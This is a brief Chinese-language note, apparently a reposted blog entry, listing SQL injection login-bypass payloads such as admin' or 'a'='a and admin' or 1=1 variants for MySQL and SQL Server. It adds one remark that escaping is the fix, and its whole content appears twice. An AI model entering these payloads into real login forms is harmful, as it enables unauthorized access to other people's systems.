admin' or 'a'='a
admin' or 1=1#(mysql)
admin' or 1=1--(sqlserver)
admin' or 1=1;--(sqlserver)
用户名::admin' or 'a'='a
密码:admin' or 'a'='a
对应的解决方案呢就是做转义喽,同理还有跨域攻击
admin' or 'a'='a
admin' or 1=1#(mysql)
admin' or 1=1--(sqlserver)
admin' or 1=1;--(sqlserver)
用户名::admin' or 'a'='a
密码:admin' or 'a'='a
对应的解决方案呢就是做转义喽,同理还有跨域攻击
转载于:https://my.oschina.net/chuibilong/blog/638861